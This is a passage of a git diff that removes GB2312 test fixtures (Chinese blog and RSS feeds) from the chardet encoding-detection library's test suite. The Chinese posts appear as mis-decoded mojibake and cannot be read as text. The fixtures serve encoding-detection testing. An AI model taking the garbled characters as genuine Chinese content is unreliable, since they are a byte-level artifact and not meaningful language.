    ׂ²׃׀ׂ»¶¨‎ֱ¿µִִ¸װ³ִװ½מ±ָ½ַֿו׀ׁ¡£²»¾ַֽ¼¸¿יָגֳ´£¬־ׂ³װֻ״»¹²»׀׀£¿²»¾ַֽ¹«װ³ֳ´£¬װְק÷¦»¹²»ַ־ֳִַׂ¸װ³ֹתµִ£¿²»¾ֲַֽֿׂ»´תֳ´£¬־ׂ½ֲּֿׂ»´ת³װֻ״»¹²»׀׀£¿׃׀¹¦·ע¸ֿ±קײ£¬־ׂ»¹²»ָח¶אֻ¯»ב¶ש£¬¶אָ¥÷׃±ֱן´ןֱן´ן£¬¶אָ¥ֹ½ֹֿ׳×׃ֶ׳×׃ֶ£¬־ׂ¶אזּ¹°¡~~~ ׂ²׃׀׀©ִװ½מ±ָ½ַֿו׀ׁµִ¹«װ³£¬ֳַֻֿכ£¬ְְֳצִ¸װ³¾‎׳׃÷ֳוֿ£¬¿ֹױזְַׂ»¸צ»״¼ׂ°ֹ£¬װחֽםׂ²»בִוµִ¡£װֻµֻ‎ֳַ¸ֿ±קײ³ֹס«£¬־ֽֽׂװ¶אµִָגׂ²¾­²»׳¡ױּ¡£ֻשׂװִךַבֶ¯ֱֱµִִ¸װ³ֶהµׂע¸ֳµ±׳ק־×ׂ»ײײ¹«¹²׳װ´£¬ֲת´ף½ײֻז±ד¿´£¬¿´¿´¾ֽ׀׀ֱֻ¡£ְםֿכײ׀µְִֵֶֿ°¡£¬»¹ַׂ×ױׂׂ»¸צ¡£¡£¡£ֿס־ֲׂטׂ»ׁש°®־ׂµִ£¬ֳִָ־ׂ¾ץµֳ־ׂ£¬¶ר²»ַ־ֽֽׂµִָג£¬ַָ«ְ½ח׳מײ״ׂ×µִ¶«־ק¡£¡£¡£µִִ¸װ³¡£׳מ÷ֳׂ²±נ±ֶ׳ֵ־ׂ³ֹּלְְְֻ»מµ״´עֱװ£¬׃׀¿ױµִ±÷עִֵד׳ֵ־ׂככא¾¶ש£¬µ½÷׃±µצµצ׃ד£¬µ½ֹ½ֹֿ¿´¿´ָױֲה£¬ױגׁש¶א÷ֳ°¡~~~ ׃ַױג׀©ִװ½מ¹«װ³÷ִֽװ½מִ¸װ³װ÷׃±¡¢װֹ½ֹֿֿא׃צֱֻ£¬ׂ»ֹש¡°א£¬ִדׂ²װױגְןֲנ¡±¾ֽ½ב÷ֿװׂ»ֶנֱֻ¡£
    -
    ¿ֹֿ§÷ֳ¾°²»³₪£¬±קײִ¸װ³ֳַ²»ְײׂגֱֻ£¬ ׀ִֿכ־ֳֳַׂ¿ּלװחֹֿ־וµדײ׃¾ֶֽנְ´ֽשֽ·ִֹֿ¨ײם׃ֽ£¬ׂ»ָױָ‎²ִֽך¸´ׂ»ִךµ״¶צ׳ֵ£¬½פ¸ת³±ֱק·חֿע±ך£¬ֱֻױגֳ´¶א¿א£¬ »¹ׂ»¿ּ²»µֳ°²׀ִ£¬ֶ¾²ֳ´ִדֳַ²ֳ´¶¼²»׳צ£¬»¹²»ְֽ¶ר»ס£¿´ף¼ׂ¶¼ֽזµִ׃־ֿ·£¬ֶ¾²ֳ´ִדֳַ²»²־¼׃£¿¾צ²»ֳִִָדֳַױגֳ´זּ¹£¡½דֳֳֳַ£¬ֳָ־ֳֵַֽׂ½בֶנְ´£¬±ֹ׃ֻ‎ֳַ!
    -
    ׃ִַװ½מִ¸װ³ֳַ·¢ֿײ׳װ¼÷µִֹת´ז¿ױ¼הײט¼ץ£¬׳µ½ְִִן¶¼װגµ½±ֹ׃¸׀µ½׀³£÷ַ°ּל÷ְֽֿ¹«ֹֿ½ײ·¢ֿײֳֻקִ¿ױֵµ¨µ״¿´ְֳֵ®£¬׳עּל±¨ײ½ֹֻֿµ־ֳַׂױגׁשµִ½׀ְֱֵ®ָֻ£¬½סּלֽ¬ֲײ¸װנ־ׂ½ֳֵֹֿ»ֽ¿ײ¸¼׳׃ֽ¡­¡­µח׃ֹֿ¡¢µח׃°ְן¡¢ֽרֹֿ¡¢¹ד¸זְֵֶן£¬µ½´¦¶¼ְֳֵַ®µִ׀״¸¬÷ֶֽ¨¹ֹ£¬ֻז±דֱא±¾װ׃ײ¾£¬ֳ¿ׂ»ׂ³ױױֶ¬ְןµִֵ®ָֻ¶¼ַֿײµֹת»מְןױׂ²»׳ֵµִ¾רֹ«ְֳֵ®¡­¡­ֻ‎ֳַּלּלֻµ־ֱֳַֽׂ£¬ֻµ־ֳַׂ³ף£¬ ֻµ־ְֱֳַׂ£¬ֻµ־ֳַׂ²»¾«ײֲ£¬ֻµ־ֳֳַׂ»׃׀ֵ®ָֻ־¶£¬ֻµ־ֳַׂ·£¬ֻµ־ֳַׂ´ְ£¬ ֻµ־ֳִִַּׂלְֿ¹«±»׀¡÷ְך¾«¹´ֱֵֻ׳װ¼÷»¹²»ײ×µְװץֳ´»״ֲ¶ש¡­¡­ׁ¹ֱ¦ּ«´ףֱֻ£¬־ֳַׂ¹»ֱֻ£¡²»¾ַֽ±קײֳ´£¬־ׂ¸ֿ»¹²»׀׀ֳ´£¿־ׂ£¬־ׂ£¬־ֹׂ±ַ§µ¶ׁ×ֶ´ָ¥£¡¿ֹµָ¹‎¼¸ּלֹױֱֻֻֽ£¬ִװ½מִ¸װ³׃ײּז׳װ¼÷²»ײµ£¬¾צ¶¨׳׳װ¼÷µֲִ·¡£ױגײײ³ֱֲ׃כ¿¹ױש½»ײ¯ׁ­»·£¬°יֻז׳ֵֹתְםײֶ·´¸´³צֿײ¡£
    -
    ִװ½מִ¸װ³ֳַ׃ַ·¢³צֱֻױגׁשµִ¸׀ּ¾£÷ֿ׀ְ´־ֲ³פ³פְֳ±¾ְ´ַ¼‏ֽ¦ְֳ÷ֳµֲִ¶ש£¬װץֳ´¾ֽֽ»ָ»±ה³ֹׂ»ײײׂו־סֱִֻ״£¿ִ¸װ³÷־¿א־×ִִׁ¸װ³£¿ָח¹־ֳַׂ´ף¼ׂ¶¼ִֿסfr jj ׂ»ׁש£¬׳װ¶¯¹‎ֲֻ¸÷ֳז·´ְ¡£¬־ֿ·ֵ´ףױ‎ֳז·´ְ¡£¬ֳ¿ּל׳װ׃י׳װְײַמ¿×׀ִ£¬ױג¸צְ½ח¸ֳ׃׀¶א÷ֳ°¡~~~ =D
    -
    -false -
    - - - -eighthday - -2005-08-26T15:29:00-04:00 -2005-08-26T22:24:41Z -2005-08-26T19:30:52Z - -tag:blogger.com,1999:blog-8009332.post-112508465273929579 -Sisters Are Doing It for Themselves - -
    1995ִך£¬ ־ׂװִ³µחֶק³ְַןּװµ½ֱ½ױֵVCD£¬´ף¸ֵ½׀¸סְ³ְֳ°ה½±¾­µהֻ²¼ה£¬ױ¼¯ֱָֻ‎ִֻ®¸צ¸ט׀ַµִ»ס½±ׁ³×¡£ְןֳז׃׀¸צִ׀¸ט׀ֳַ¿ׂ»¾ײֳ¿ׂ»ֽ¶׳דֳ¿ׂ»¸צֹׁס¶¼µחµֳ־ׂ¿¸ֹֹאװןֶװ־°ֻֻ״ֱ½ׁײ±ֳ°ּׂ׀ִ£¬ֻ³×µִַSweet Dreams Are Made of This¡£ µ±ָ»²»¾ֳ־ׂ¾ֽ·¢ֿײֶֻהµַ¸צֵ®µִ£¬ֳ½׀Annie Lennox£¬ֻהָ»ַׂל׀װֱµ£¬µ«³£׳צײ׀׀װ´ע°ח£¬·¢³₪÷ֹ³¬¹‎ֱ½´ח¡£ֵצַֹֻ‎»ס½±µִ±÷ע׳קִ׀׳°´ע°חֹּֿ¨ׁ³×£¬÷¦µֳ־ׂ·¼׀ִׂ»ֶ¬׀ם´םֱֻµ״·½¡£
    -
    ¶אִךׂװ÷ף, ־ׂ·¢ֿײ־ׂ¶װֿסAnnie Lennox¡¢Sade¡¢K. D. Lang¡¢Ellen DeGeneres¡¢Whoopi Goldbergױגׁשµִײ׀׀װֵ®ׂױָֻּ״±נ׃׀¸׀ַי£¬¶רַַׂׂ»ײײּ״±נֹמ³ֱ¶ר³ײ¾ֳµִ½׳¼¶¸׀ַי¡£׃כֽ¬׀װֱµ־¹״£¬ױגׂ»ַ׀¼׃ׂ»ײײׁב¾כ£¬ׂ»ײײ¶װµ±½סֹח»בֱק׀׀µִ׃¹ֻ׳¼ײµ¹µִׁב¾כ¡£ µח׃°¡¶Searching for Debra Winger¡·ְןֳזֻµ÷ְֳ³־כµח׃°ײֶֶ¬ֹּ¾צ¶¨ַ·סֶפ׃ֳׂ»¸צֵ®ׁװ±µִ»ש±¾׳¼װע¾ַֽ¡±Is she f**kable£¿¡±¡£ֻהָ»ְָֻא¶¼½ר»¯µ½װל÷½ּל·ֹ»תµִµ״²½ֱֻ£¬µ«ֹח»ב·חֶרµִ´ף·½ֿע»¹¸תװ­¼ֶָֻֻµִ£¬ֵ®ָֻµִ¼ײµָ¡¾צ׃ַׂ½צָ¡¾צ׃ֶהf**kablility¡£ױגײײ¼ײµ¹¾ֽ÷ֳ±ָ׃׳¶שװ°ְֿ¦ֻµײ±³÷ף׳רµֳ¶ֻµִ׀¡ֵף׃ׁ¾ַֽ÷ֳ÷¢׳׃ׂ»ׁש£¬ַׂ»ײײׂ»¸ש½מ¶שֶֻµִֻ¼־¬·½½£¬¼«ֶה׃ֱֳ¡£¶רױגײײ¼ײµ¹µִ÷´־ְױ¶¼ַ׀©ֶַיֱש׃ְןײ»£׀װ׃µִײק¶ש¡£ָח¹ִדָֿ־×׳װ¼÷µִ׳ׂ×¶¨ׂוַָֻ£¬¶ר²»ֵַ®ָֻ£¯ִ׀ָֻ£¯ײ׀¹תָֻ£¯ֽג¹תָֻ£¯¸»ָֻ£¯ַמָֻ£¯·ָֻ£¯ָֻµָµָ£¬ֳִַ´ִד׃¦¸ֳִ¹»ְם½גֵ®ָֻ¶װױגׂ»ַ׀׃׀¶אֳ´ׁב¾כ¡££¨ָח¹ִתָֿ־×׳װ¼÷µִ׳ׂ×¶¨ׂו²»ַָֻ£¬ִִַתׂ²²»׃ֳֽשֲֿ¿´ֱֻ£¬¶¼ַָֻ»°¡££©ֹת־×ֵ®׀װ£¬²¢²»´ת±ם׳ֵ־ֳַׂװ¸ׂג°ָׁ«²¿¾«ֱ¦¡¢½נַ®¡¢±¼ה¡¢ֹתֳ¶¼ֽ¶ָכµ½maintain ׳װֹםf**kbulityµֲִׂµײ׀ָ¥¡£־ֳִַׂ׀ִֹמ´¦¿ֽ¿ֹׂװ°ֽׁױגײײ¼ֻֿר¡£¾ֽֿסTalktoherװֻ‎ָױ¼ְַןֻµµֳִַׁש£÷¡°´׃ְ´¶¼¸ת׳װ¼÷µִ׀װ±נ׃׀ײײ¸פ÷ׂ¸׀£¬ֱ¦²»´׃׀ִ¡£ֿכ׳ֵׂ»¸צֵ®ָֻ±״׀כ»מ³ֹׂ»¸צ¾«ײֲ¸גµדµִִ£ׁש£¬ֿדֿדµִ£¬ּנּנµִ£¬ְֻ׀ִֻתµ״ּײ÷ֳ±נָֻµִ־¸¿£¬·³¡£²»ַֻµ׳װ¼÷װ¸ׂג׳צ¸צִ׀÷¢£¬¶רַװ¸ׂג׳צ¸צֳ»׃׀׀װ±נ¸׀µִ׀¡÷¢¡£´©׳ֵֽֿ׀¬£¬²»´ק׀״ױײ£¬־׳ֵ±ש¹קֲת½ײ»־£¬ֹּװ²µ״ֹֿ£¬ֳ׀׳ֵׁ¾¦¿´ּ«ׁפ£¬׳מז·‏¡£¡±¡¡
    -
    ׃׀ׁב¾כ׳װָ»׃׀·´ֵׁ¡£¶רײ׀׀װֵ®ׂױָֻ¾ַֽׂ»ײײ·´ֵׁµִµה·¶¡£´׃ֻ‎ֳַֹםֹֿ£¬־ֳַׂ¿ֹׂװ¿´µ½ׂ»ײײ׳װ׃ֹ£¬ׂ»ײײ²»׃ֲֳפ׀¦µִ׳װ׃ֹ£¬ׂ»ײײ¿ֹׂװ׃ױג¸צִ׀ָ¨ֹח»בµִײײײײ¹זװעָח·אֱֽµִ׳װ׃ֹ£¬ׂ»ײײ²®ְ­ֽ¼½µִ´׃׀װײ׀½ג·ֵ³צְ´µִ׳װ׃ֹ¡£¾ֻµAnnie Lennoxװרװֲׂµב·וµִ±÷ע׳װ¿הַmusic industryְן־¨ׂ»ׂ»¸צ²»¿¿ֵ®ֹ«ְ´ֲפ³×ֶ¬µִֵ®¸טײ¡£ֶהµֻ‎װֹֿ¸צְ¼ֽ80ִך´ת¾ֽ³×¹‎ׂ»׳¸ט£¬½׀׳צSisters Are Doing It for Themselves£¬¿ֹׂװֻµַױגײײִֵׁז¾«ֹסµִ¾ר¼ׁ¿÷ֵ¡£
    -
    ¶‏®¶אִך÷ף£¬־ק·ח´µµ½ֱֻ׳ז¹ת´ףµ״£¬ײ׀¹ת³צֱֻ¸צְמ׃מ´÷¡£׃׀³¬¼¶ֵ®׃סֳ׳´«¸ר־ׂׂ»¸צׁ³×׃ֶµ¡£־ׂׂ»¿´£¬ױג¸צְמ׃מ´÷¸ט³×µֳ²»ױ¦µ״£¬³₪µֳ²»ֶ¯ֱֱ£¬»ש±¾ֳ»׃׀µ¶‏׀װױק£¬µ«µִָ·÷¿ֹ°®¡£־ײֳ´£¿¾ֽ־×ױג÷¢׳׃¼ֳָ»ֱ³µ°¶ש׃ײֳ»ֹם²ִ»¹ִױגֳ´׳װ׀ֵ£¡ֻ‎ֶָֻרֽת־ֽׂךָ«ְם½ג¡£׃׀׀©ֻ¼ֿכֲה÷ףµִ´ףְֿׂ¯ֳַ¶שֳַ׳ר²»׳¡ֱֻ£¬·׳·׳ּר³צְ´׳ק־ְµְ¿£¬ֻµױג¸צ³¬¼¶ֵ®ֹשװץֳ´ִׁ¡¸צ¼ָ²»ֵ®׃ײֳ»ֹשf**kability»ש±¾־×ֱדµִײ׀׀װָֻ£¿ױג³ֹ÷־ּוֽ³£¿ׂ×־ֻׂµ£¬ִַ׀©׀־ֿף´ף¹¡¢ױג׀¡½דִַ׀¡½דµִׁ¡¾ֳַװץֳ´²»¸ֳִ½׀׳מ¼ׁ¶‏ִּׁ¡¾£¿׃׀ֳִַ´¶א׳¨ֳֵ׃יְײִדֳַµִ½ִ¿¿´£¬ִדֳַ¸תױג¶ש´ױ²ֳ´ִָָײ£¿²»ֹױגׂ»³צ¡£³¬¼¶ֵ®ֹש¾ֵַֽ®׀װ׀ִֹש£¬²»¹ֻ­׃®£¬¶¼ַSisters Are Doing It for Themselves£¬ְֿׂ¯ֳַ²»·µִ£¬ּ‎־ׂׂ»¾הָ°£¬ִדֳַ°¡£¬ִִ¶שֱ¹¿לִִ¶ש´פ׳ֵָ¥¡£
    -
    -false -
    - - - -eighthday - -2005-08-19T15:47:00-04:00 -2005-08-27T03:04:40Z -2005-08-19T19:48:42Z - -tag:blogger.com,1999:blog-8009332.post-112448092276845146 -¡¶¾ײֽגָֻ¡· - -
    ½סּל¶ֱֱֻ¼׃חׁµִ¡¶¾ײֽגָֻ¡·¡££¨¿´µִַ׃¢־ִ°ז£¬׃¢ׂכthe stranger, ¾ץµֳ»¹ַײ׀ׂכ±¾ֳ׳ײ÷ֳ¡£¼׃חׁµִ¡¶ףׂ¡·־ׂ¿´µִַ¸צ׃¢¹תְֿ׀אµִׂכ±¾£¬»ֹ¬¼«ֱֻ£¬÷ֳ²»ָׂ׳²ֵ¶ֱ³צׂ»µדµד־¶µְ£¬¾ר¶װַ¸צdisservice. ¶ר¡¶¾ײֽגָֻ¡·¿´µִַ¸צְֳ¹ת´ף°׳»°ׂכ±¾£¬¾ֻֽ³ׁ¶אֱֻ¡£¡£÷ַ÷ַ£©¶ּ¶ּ123ׂ³£¬¶ֱµ½׳מ÷ף¼¸ׂ³µִ±÷ע׀ִװא·ֲ·נׂ×´׃ֹםּוְן±ֱֵׁ³צְ´¡£ָ»÷ףװ½ֿכ¾ֽװ½¾ץµֳֻֿסׂ»³¡¾«׀ִ²»®־׀¸¿ֹ»קµִִ±ֹ±°¸£¬¼׃חׁװ׳מ÷ףׂ»¿ּ²ֲֵֵ¶ײקָֻ¹«µִױזµ¾«ֹסֳזֳ²£¬¾«׳¼ִ±ֹ±ֱֻׂ»ַ׀¹״׃´ֻי½³צ׃כ·סµִ»³ֹׂ¡£ױ×ׁ¾µײֲ¾´¡£
    -
    µ«־ׂ²¢²»¾ץµֳ¡¶¾ײֽגָֻ¡·ַ±¾ֱמָֻ¾רֽµִ׀¡ֻµ¡£»עױֻµֳֻ»׃׀ֱמ־ׂ¾רֽ¡£׳ָֿ־ׂׂ×÷סׁױ־³µ״ֻµ£¬־ֲ־ׂװץׁשָֽֿ¬ײקָֻ¹«ִ«¶ֻק£¬־ׂ־·¨ֿסִַֻׁש¾ר¶װ³ֿµ¡£ִ«¶ֻקµִֵ®ֵף׃ׁ־ֻ‎½ב»י÷ֳ²»÷ֳ£¬ ֻֻµ÷ֳ¡£׃ײ־°®²»°®ֻ‎£¬ֻֻµ־ֻש־½°®²»°®µִ£¬ָח¹׳׀ֿ¸ׂ»ֿכ£¬´ף¸ֵַ²»°®¡£יײ׀÷¶אְ‎׳׃¶¼ַױגׁש£¬׃ײ±ָָח±נָֻ־ֲֻטֲטְֻµִ±÷ע¼¸ֻך£¬ֻ¾ֻֽµֻׂ²²»ײ×µְ¡£ֶהµֻז¿¾ֽ¿ֹׂװ±אׂ»¸צ£¬ׂװ¼ץְֹֻ׳ֹףֵ׀µִ £¨ֶהµױגײײְֻ׳ֹףֵ׀¾ַֽװ´׃¿ײ¾ו¡£ִ«¶ֻקַ¸צ¼«¶ֻµִ´זװײקׂוױ£¬ֻײ»¶װ׳װ¼÷µִָֹֻת¸÷װנ¡£¾ֽֿס÷לֲ¥ֳ־ְןµִ±¦קל¶‏ָֻֽ½ְֽµ״ֿכּ׃ֽׁ·ג½¨¹ף׳וµֳִװֻׂ»ׁש£¬ֻֿכ°ֳׁ¿ׂ»·ײײ׃¶¼°´ױױ׳װ¼÷µִׂגװ¸ְ´ֹת»מ¡£ֻ¶צֱֻ³װ£¬ְ§ֱֻֻ¯£¬ֹ¹ֹ¹ּ«ׁפ£¬׃־׃־׃¾¡£ֻ²»װ¸ׂג־×ֱֻ׃¦¸¶ֹח»בֿ°ֻ׳¶רְֻ·ׁׂ»·ײײ׃¡£µ«ַֹח»ב´׃ְ´²»װ׀םױגׁשµִׂל¶ֻ´זװ¡£ְָֻאֹח»ב׀טׂ×ֳ¿¸צ³ֹװ±¶¼ׁ±·‏£¬ֲִ׀׀ֹח»ב·ײ¸רֳ¿¸צ³ֹװ±µִׂו־ס£¬¸ֹ»מ¡¢ױץַ®¡¢´«׳½׃´ת¡¢ׂ»ּץµְ¶שֵµ½÷¡£±»ׁ±·‏µֳִַָֻ»בֱ×÷ֶֿנְ´³ֽ½הױג׀©ׂל¼÷·׳׃£¬¿¹¾´׃ֿׁ£©¡£¿ִַֹ«¶ֻק¾ַֽ¾²»÷ֿ׳ק¡£ִ«¶ֻקַװµ¼שׂ»ײײ¾ר¶װ³ֿµµִװ­װע¡£ֻ¾ץµֳ־ֻש־½µֲִַיֻ¾ֽ¾¾ר¹״׀ִ£¬ֹץײֱ¾¾ר׳צ¹״׀ִ׳´£¬ְֱµֳָצ»ׁ¡£¶ר־ׂ¾צ²»»ב־×ֱֻ³ֿµ¶רּֽ³צ׳װ¼÷µִִװא¸רְָֻ¿´¡£±ֿ¾¹£¬־ֳַׂµִִ¿µִ²»ַ־×ֱֻ³ֿµ¶ר³ֿµ£¬¶רײ»ַֿכּ׃³צְֻ׳µִ¼ֻֿר׳װ׃ֹµִֹת»מ£¬ָח¹ּ׃µִ´ת¼±¾ֹם±ה³ֹׂ»ײײר¸¿£¬־ֳַׂ¾ֽ׃¦¸ֳ»»ׂ»ײײ·½½¡£
    -
    ֶה´־£¬־ׂ²¢²»ַ¸צ±±physical needsׁ¹µ¹emotional needsµִָֻ£¬ױ‎ֿא·´£¬־ַׂ¸צ´ףִװ׀טַף±±ׁ¹µ¹ֹתְם׀טַףµִָֻ¡£ױגַ־ׂ÷ִֽ«¶ֻקµִ׃ײׂ»²»ֽ¬¡£
    -
    ׳מ÷ף£¬¼׃חׁ׃ֳױג¸צ÷¼«¶ֻµְִ‎׳׃¹´ֶנ´ף¼ׂµִֽ¬ַי£¬ִ¿µִַ»½׀ׁ¸¶אָֻµִ¿םָ¡£ֻז׳ֵ´ֻיµִׂ»°זװ°ז£¬־ֳַׂ׃¦¸ֳֿא׀ֵֹת´ז¿ױ¼הװ²»¶ֽֿ״ױ¹ײ׀¡£׳ײ®־ׂ²¢²»µ£׀ִ׃׀ׂ»ּל־ׂ»ב±»ֹףֵ׀£¬־ׂׂ»µד¶שֳ»¾ץµֳױג±¾יֱמָֻ¾רֽ¡£
    -
    ֿא·´£¬־ׂׂע־×¶ֱֱֻױגֳ´ׂ»±¾÷ֳי¶ר¸׀µ½־±ָ»¶׀ְָ¸װ¾~~~~
    -
    -false -
    -
    diff --git a/chardet/tests/GB2312/godthink.blogsome.com.xml b/chardet/tests/GB2312/godthink.blogsome.com.xml deleted file mode 100644 index 991b645..0000000 --- a/chardet/tests/GB2312/godthink.blogsome.com.xml +++ /dev/null @@ -1,102 +0,0 @@ - - - - - Good Think?God Think - http://godthink.blogsome.com - Just another WordPress weblog - Fri, 07 Jan 2005 15:45:31 +0000 - http://backend.userland.com/rss092 - en - - - - ²»ײ×µְ־ײֳ´£¬ױג¸צBLOGSOMEְַֿ¸׀¾ץ²»־ָ¶¨£¬¹ײ¹ײ - - - http://godthink.blogsome.com/2005/01/07// - - - ײױ׃¿¼ֽךֱֻ - 1¸צ°כ»ע°כ¸צ¼ֶֻד´םֱֻ£¬»¹׃׀5£¬6¸צּמ¿ױֳֹµִ -ֿ£ֽ±נ¹ׂ¡£ -ּו׃‎ׂ²¿¼ֽךֱֻ£¬ -־ׂױגײײ׳דַע°׳³ױ¾¹ָ»¹‎8¸צ¸ֻײ»׃ֱֳֻ9¡£1ֳכ -ֶז¼£ֶז¼£ - - - http://godthink.blogsome.com/2004/12/29/ooouieae/ - - - - ֱפµִַאֹ½װ£¬²»ֲֳֵ»²סֹױ¡£ - - - http://godthink.blogsome.com/2004/12/28// - - - - ־×ֱֳֻקּלµִ¿¼װ£¬־ָׂ¥ֹֿ׳װֿ°¡£ -־ׂ¿¿ - - - http://godthink.blogsome.com/2004/12/28// - - - - µ«ַ־ׂ²»ִֶרְ£¬ױג´־ׁ¡²»ֹֿ»¹׃׀ֲֿ´־ֲן¡£ -¼׃׃ֽֿ‏׃מ¡£ - - - http://godthink.blogsome.com/2004/12/28// - - - ³¬¼¶׃פֳֶ°¡ - ױזַµ¹ֳ¹£¬װ½ַֿכֹֿµִװ½ׁ¡²»ֹֿ°¡£¬ -׃¿־ְב°¡ -°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡ -³¬¼¶׃פֳֶײ׀ - - - http://godthink.blogsome.com/2004/12/28/ooaae/ - - - ¿¼װ¸´ֿ°ׁ½ - ֳקּלֲֿ־חׂ׿¼¶אֳ½ּו¼¼ץ׃כ׃¦׃ֳ£¬ -ֿײװׂ×׳¥½פ±¼הֱֻ¡£ -ײ־וֲֿ־ח־ֳַׂ¸ײ׀ֽ¬ׁ§¾»ב£¬÷ֳֿכֲםֹֿ¿´µ½´ף¼ׂ¡£ -ױג׀ֶַ¿־³ָּ«ֽ£ֱֻ£¬ְֿ¦ײ»´נֹׂ£¬װחֹֿµִ׃¢׃ן¿־¾ְֽ´ֱֻ20¼¸¸צֽ¬ׁ§£¬ -־ְׂ­´°ֱ±±°ׁׂ»¸צ²»ַ־ֳַׂ°אµִֵ®ֹתµִֻ®÷רֵ×ָקֱֻ£¬÷ַ÷ַ¡£ -°³¿ֹ²»ַ¹ׂגµִ¡£ - - - http://godthink.blogsome.com/2004/12/28/eoin/ - - - ֲֿ־חֻ¯¾ץ²מµדֶנ²»ְ´ - ײױ׃µ½ֱֻ3µד£¬ײױ׃ֽ¬ׁ§ְ´ֱֻ3¸צ¶ּ׀ֵ£¬ײױ׃־ֲֿׂ¾צ׀ִֶנ´²ֱֻ¡£ - - - http://godthink.blogsome.com/2004/12/27/iaiceoiuaaedha/ - - - »³ִמֳ«ׂ¯ׂ¯ - ½סּלֳַ«ׂ¯ׂ¯µִµ®³½¼ִֽמָױ£¬ֹמֹמֳו»³ - - - http://godthink.blogsome.com/2004/12/27/aiaoo/ - - - ³µ½£¬ׂ»²»׀¡׀ִ - װחֹֿױֵ¿×ׁ7µדֱֻ£¬ֳ»°ל·¨£¬²»¹‎»¹ֻד׀ׂװֻ£¬ײ»µ¢־ףֱֻׂ»½¿־£¬ -µ¶‏½ִ״£¬µ±ָ»ַ²¹׳קׂµְ²¡£ -ֻ¯µֳז·‏£¬ײױ׃ֳ»·¸׀ֶַׂ»׳÷ֿײ¢¡£ - - - http://godthink.blogsome.com/2004/12/27/uuodhdha/ - - - diff --git a/chardet/tests/GB2312/home.donews.com.xml b/chardet/tests/GB2312/home.donews.com.xml deleted file mode 100644 index 18b0c00..0000000 --- a/chardet/tests/GB2312/home.donews.com.xml +++ /dev/null @@ -1,154 +0,0 @@ - - - - - DoNews.COM - IT׀´׳קֹחַר - http://www.donews.com/ - Donews׳װ2000ִך4װֲ´´ֱ¢ׂװְ´£¬ײ»׃ֳ°כִך±¼ה¾ֽ³ֹ־×ײ׀¹ת׳מ´ףµִIT׀´׳קֹחַר¡£ֿײװ£¬ֻׂµֵֽׁׂ½בֱֻ3.2ֽעֳ±א¼­¡¢¼ַױ¡¢׳װ׃ֹ׳«¸וָֻׂװ¼°IT´׃ׂµָֻװ±³ֹ־×ֻµִ׳¨ְ¸׳קױ»עֲּ³׃ֳ»§¡£Donews¼ב³ײInternet׳װֹםµִ׳װ׃ֹ¡¢ֶ½µָ¡¢¿×·ֵ¾«ֹס¡£»¶׃­ֳ¿ׂ»·ױז³ֿµִ½»ֱק£¬ֳִָֹ¿ׂ»·²»ֹֻ÷¦±נָֻµִ¸צ׀װ£¬±£»₪ֳ¿ׂ»ײײ¿ֽ³ֹ¹¦µִװ¸ֽ¡£»‎¼«¡¢½רָ¡¡¢ֿעֹֿ¡¢½¨ֹטַֻֻשּב³«µִֶ·¸ס¡£ - zh_CN - 60 - - TRS WCM 5.2µֿײ´´׀ֲֽרֲחֶױ·¨ְ¸ִ¿¡¶·¨¹ֻµ·¨¡·װֿײ±²¥ - http://www.donews.com/donews/article/8/89482.html - 12װֲ29ָױֲֿ־ח£¬׃ֹ±±¾©׀¸¼¶ֳָֻס·¨װ÷׃כ±±¾©ָױ±¨ֱ×÷ֿײק°ל£¬²¢׳´־ֶֽ³צµִׂװװֽרֹֿ׃כ¶ֱױ»¥¶¯־×׀־½µִָ«׀ֲֶױ·¨ְ¸ִ¿¡¶·¨¹ֻµ·¨¡·£¬װ±±¾©·¨װ÷ֽר׃כ¾©±¨ֽר½ר׀׀ֱֱֻ×÷ֿװֿײ±²¥¡£¾ֱֻ½ג£¬´ֻ´־װֿײ±²¥ַ׃ֹ±±¾©ֽ״¶ֻ¼£¨TRS£©׀ֵֿ¢¼¼ץ׃׀ֿ¹«ֻ¾ָ«³ּ½ר׀׀ֿײ³¡¼¼ץײ§³ײ£¬±£ײ₪ֱֻ½ִ¿ָ¡µֳװ²ֲת³ֹ¹¦¡£ ¾ֿ₪£¬ײ±²¥µ±ּל£¬½ִ¿ֿײ³¡ֶר·ױֱָָׂ£¬ֽר׃ֳַּׁב־׃»װ¾£¬ֿײ³¡·¨¹µִ½²½ג¾«²÷ֽֿךֿ¸£¬ַ׀µµִ½ג¾צֱֻ׀ם¶אֽר׃ֳַׁװ·¨ֲֹ·½ֳזµְִ§»ף¡£½ִ¿ׂ»¾­ֶֽ³צµ½ֱֻ¶א·½÷ְֳֶ£¬ֽ¬±ׂ²־×־ׂ¹תֶױ¼°÷ֽ´«²¥·¨ֲֹײ×¶¿×±ֱֻׂ»ּץױ¸׀ֲµִµְֲ·¡£ ־×ֱֻ±£ױֿװֿײ±²¥½ִ¿µִֻ³ְ½ר׀׀£¬... - 2005-12-31 10:24:36 - ֽ״¶ֻ¼ - - - ¾­¹ּ״¿¯־ִױֲ£÷²©¿ֽ2008£¬ָ÷ײµִ±םֿײ׃׃׀¶אַ¿ - http://www.donews.com/donews/article/8/89481.html - ¡¡¡¡±¾±¨¼ַױ ֽץְײ/־ִ ¡¡¡¡1998ִךְֳ¹תָֻµְֲ­¼×¹׃ֳBlog£¨²©¿ֽ£©װָ«ַעµׂ»¸צ±¨µְֱֻ¿ֱֻײ¶÷ְֽ³־ִֻ¹»שח³־ֵ£»2001ִךֹֿ°¸צ¸צָֻBlog³ֹ־ס°9¡₪11¡±ֲ¼‏µִײ״ׂ×׀ֲ־ֵװ´£»2004ִךְֳ¹ת׳ֽ³÷עׁ¡ָֻ¿×¼׃ֳBlog׳ק־×·¢ׁװױףµ״£»ֲ׳¶״µ״ּת±¬ױ¨°¸ײ׀ׂ»ױֵײ»תBlogֽ¼ֶ¬¼¸÷ץ³ְֱֹֻ½חֹֻֿש׃׀ֽ¨ׁ¶ֹח¾÷ֿאױש¶בµִ¶װֿף¡£ 